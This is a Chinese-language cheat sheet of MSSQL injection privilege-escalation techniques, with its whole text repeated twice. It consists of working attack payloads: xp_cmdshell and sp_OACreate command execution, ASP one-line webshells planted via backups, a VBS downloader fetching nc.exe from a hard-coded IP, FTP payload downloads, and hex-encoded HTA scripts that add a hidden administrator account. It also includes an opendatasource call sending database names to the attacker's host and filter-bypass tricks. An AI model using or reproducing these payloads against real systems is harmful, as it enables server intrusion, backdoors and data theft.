MSSQL注入提权的一些方法
MSSQL注入提权思路:
SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提储存过程健在)
相关SQL语句
XP_CMDSHELL:
数字型;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
字符型&搜索型';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
Sp_OACreate:
数字型;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
字符型&搜索型';declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
p.s.(2000系统WINDOWS改为WINNT)
沙盘提权:
开启沙盘模式;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1--
然后利用jet.oledb执行系统命令;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c cmdline")')--
p.s.(2000系统WINDOWS改为WINNT)
直接备份一句话木马;exec sp_makewebtask 'WEB绝对路径/fuck.asp',' select ''<%25execute(request("a"))%25>'' ';--
P.S.(WEB与DATA在同一主机,知道WEB目录)
下载文件到目标主机方式:
利用NBSI等工具写入VBS文件
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^" http://125.113.114.49/nc.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:/c.exe^",2 >c:/labeng.vbs
该语句作用:写一个名为labeng的VBS文件到C盘;
接着执行CSCRIPT C:/LABENG.VBS;VBS文件作用:下载 http://125.113.114.49/nc.exe到C:/C.EXE;
FTP&TFTP传输:
FTP:
CMDLINE依次输入
ECHO FTP>FTP.TXT
ECHO OPEN 125.*.*.*>>FTP.TXT
ECHO USERNAME>>FTP.TXT
ECHIO PASSWORD>>FTP.TXT
ECHO GET XX.EXE>>FTP.TXT
ECHO BYE>>FTP.TXT
作用:写一个FTP.TXT文件,内容为
FTP
OPEN 125.*.*.*
USERNAME
PASSWORD
GET XX.EXE
BYE
接着执行FTP -S:FTP.TXT目标主机就会到125.*.*.*下载XX.EXE;
TFTP类似~~
DB权限:
WEB&DATA同一主机:1,列目录找到WEB目录,LOG或差异备份拿WEBSHELL,接着提权,2,猜表拿管理员ID和密码,进后台拿WEBSHELL..3,备份提权语句到启动项,等待重起
分离的情况:1,猜表拿管理员ID和密码,进后台拿WEBSHELL..2,备份提权语句到启动项,等待重起.
判断DATA主机IP:
本地NC -L -V -P 1433 监听1433端口
;insert into opendatasource('sqloledb','server=自己的IP;uid=test;pwd=test;database=test').test.dbo.ku select name from master.dbo.sysdatabases--
暴WEB路径(PS:DATA&WEB同一主机)
;create table labeng(lala nvarchar(255), null)--
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots','/',@result output insert into labeng (lala) values(@result);--
;and 1=(select count(*) from labeng where lala>1)-- 或者 ;and 1=(selet top 1 lala from labeng)--
过滤'的处理:
;DECLARE @S VARCHAR(4000);SET @S=CAST(SQL语句的十六进制数 AS VARCHAR(4000));EXEC(@S)--
LOG备份语句:
;alter database 表 set RECOVERY FULL--
;create table cmd (a image)--
;backup log 表 to disk = 'c:/Sammy' with init--
;insert into cmd (a) values ('<%%25Execute(request("value"))%%25>')--
;backup log 表 to disk = 'WEB目录/1.asp'--
一句话变形:
a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>
备份文件到启动项:
将LOG备份中'<%%25Execute(request("value"))%%25>'改为HTA.BAT等文件的十六进制内容
例:labeng.hta
内容:
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c net1.exe user test$ labeng?123 /add & net1.exe localgroup
administrators test$ /add & del labeng.hta",0
</script><script language=javascript>window.close();</script>
-----------------------------------------------------------------------------
转化为十六进制:
0x3C534352495054204C414E47554147453D225642536372697074223E0D0A6F6E206572726F7220726573756D65206E6578740D0A536574205753203D206372656174656F626A6563742822575363726970742E5368656C6C22290D0A57532E72756E2022636D64202F63206E6574312E6578652075736572207465737424206C6162656E673F313233202F6164642026206E6574312E657865206C6F63616C67726F75702061646D696E6973747261746F7273207465737424202F61646420262064656C206C6162656E672E687461222C300D0A3C2F7363726970743E3C736372697074206C616E67756167653D6A6176617363726970743E77696E646F772E636C6F736528293B3C2F7363726970743E0D0A0D0A0D0A
-----------------------------------------------------------------------------
SQL语句:
;insert into cmd (a) values(0x3C534352495054204C414E47554147453D225642536372697074223E0D0A6F6E206572726F7220726573756D65206E6578740D0A536574205753203D206372656174656F626A6563742822575363726970742E5368656C6C22290D0A57532E72756E2022636D64202F63206E6574312E6578652075736572207465737424206C6162656E673F313233202F6164642026206E6574312E657865206C6F63616C67726F75702061646D696E6973747261746F7273207465737424202F61646420262064656C206C6162656E672E687461222C300D0A3C2F7363726970743E3C736372697074206C616E67756167653D6A6176617363726970743E77696E646F772E636C6F736528293B3C2F7363726970743E0D0A0D0A0D0A)--
------------------------------------------------------------------------------------
提升SQL用户为SA权限:
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c echo exec master.dbo.sp_addsrvrolemember
boayo,sysadmin>c:/test.qry & isql -E /U alma /P /i c:/test.qry & del
labeng.hta",0
</script><script language=javascript>window.close();</script>
用法同上...
SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提储存过程健在)
相关SQL语句
XP_CMDSHELL:
数字型;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
字符型&搜索型';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
Sp_OACreate:
数字型;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
字符型&搜索型';declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
p.s.(2000系统WINDOWS改为WINNT)
沙盘提权:
开启沙盘模式;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1--
然后利用jet.oledb执行系统命令;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c cmdline")')--
p.s.(2000系统WINDOWS改为WINNT)
直接备份一句话木马;exec sp_makewebtask 'WEB绝对路径/fuck.asp',' select ''<%25execute(request("a"))%25>'' ';--
P.S.(WEB与DATA在同一主机,知道WEB目录)
下载文件到目标主机方式:
利用NBSI等工具写入VBS文件
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^" http://125.113.114.49/nc.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:/c.exe^",2 >c:/labeng.vbs
该语句作用:写一个名为labeng的VBS文件到C盘;
接着执行CSCRIPT C:/LABENG.VBS;VBS文件作用:下载 http://125.113.114.49/nc.exe到C:/C.EXE;
FTP&TFTP传输:
FTP:
CMDLINE依次输入
ECHO FTP>FTP.TXT
ECHO OPEN 125.*.*.*>>FTP.TXT
ECHO USERNAME>>FTP.TXT
ECHIO PASSWORD>>FTP.TXT
ECHO GET XX.EXE>>FTP.TXT
ECHO BYE>>FTP.TXT
作用:写一个FTP.TXT文件,内容为
FTP
OPEN 125.*.*.*
USERNAME
PASSWORD
GET XX.EXE
BYE
接着执行FTP -S:FTP.TXT目标主机就会到125.*.*.*下载XX.EXE;
TFTP类似~~
DB权限:
WEB&DATA同一主机:1,列目录找到WEB目录,LOG或差异备份拿WEBSHELL,接着提权,2,猜表拿管理员ID和密码,进后台拿WEBSHELL..3,备份提权语句到启动项,等待重起
分离的情况:1,猜表拿管理员ID和密码,进后台拿WEBSHELL..2,备份提权语句到启动项,等待重起.
判断DATA主机IP:
本地NC -L -V -P 1433 监听1433端口
;insert into opendatasource('sqloledb','server=自己的IP;uid=test;pwd=test;database=test').test.dbo.ku select name from master.dbo.sysdatabases--
暴WEB路径(PS:DATA&WEB同一主机)
;create table labeng(lala nvarchar(255), null)--
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots','/',@result output insert into labeng (lala) values(@result);--
;and 1=(select count(*) from labeng where lala>1)-- 或者 ;and 1=(selet top 1 lala from labeng)--
过滤'的处理:
;DECLARE @S VARCHAR(4000);SET @S=CAST(SQL语句的十六进制数 AS VARCHAR(4000));EXEC(@S)--
LOG备份语句:
;alter database 表 set RECOVERY FULL--
;create table cmd (a image)--
;backup log 表 to disk = 'c:/Sammy' with init--
;insert into cmd (a) values ('<%%25Execute(request("value"))%%25>')--
;backup log 表 to disk = 'WEB目录/1.asp'--
一句话变形:
a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>
备份文件到启动项:
将LOG备份中'<%%25Execute(request("value"))%%25>'改为HTA.BAT等文件的十六进制内容
例:labeng.hta
内容:
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c net1.exe user test$ labeng?123 /add & net1.exe localgroup
administrators test$ /add & del labeng.hta",0
</script><script language=javascript>window.close();</script>
-----------------------------------------------------------------------------
转化为十六进制:
0x3C534352495054204C414E47554147453D225642536372697074223E0D0A6F6E206572726F7220726573756D65206E6578740D0A536574205753203D206372656174656F626A6563742822575363726970742E5368656C6C22290D0A57532E72756E2022636D64202F63206E6574312E6578652075736572207465737424206C6162656E673F313233202F6164642026206E6574312E657865206C6F63616C67726F75702061646D696E6973747261746F7273207465737424202F61646420262064656C206C6162656E672E687461222C300D0A3C2F7363726970743E3C736372697074206C616E67756167653D6A6176617363726970743E77696E646F772E636C6F736528293B3C2F7363726970743E0D0A0D0A0D0A
-----------------------------------------------------------------------------
SQL语句:
;insert into cmd (a) values(0x3C534352495054204C414E47554147453D225642536372697074223E0D0A6F6E206572726F7220726573756D65206E6578740D0A536574205753203D206372656174656F626A6563742822575363726970742E5368656C6C22290D0A57532E72756E2022636D64202F63206E6574312E6578652075736572207465737424206C6162656E673F313233202F6164642026206E6574312E657865206C6F63616C67726F75702061646D696E6973747261746F7273207465737424202F61646420262064656C206C6162656E672E687461222C300D0A3C2F7363726970743E3C736372697074206C616E67756167653D6A6176617363726970743E77696E646F772E636C6F736528293B3C2F7363726970743E0D0A0D0A0D0A)--
------------------------------------------------------------------------------------
提升SQL用户为SA权限:
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c echo exec master.dbo.sp_addsrvrolemember
boayo,sysadmin>c:/test.qry & isql -E /U alma /P /i c:/test.qry & del
labeng.hta",0
</script><script language=javascript>window.close();</script>
用法同上...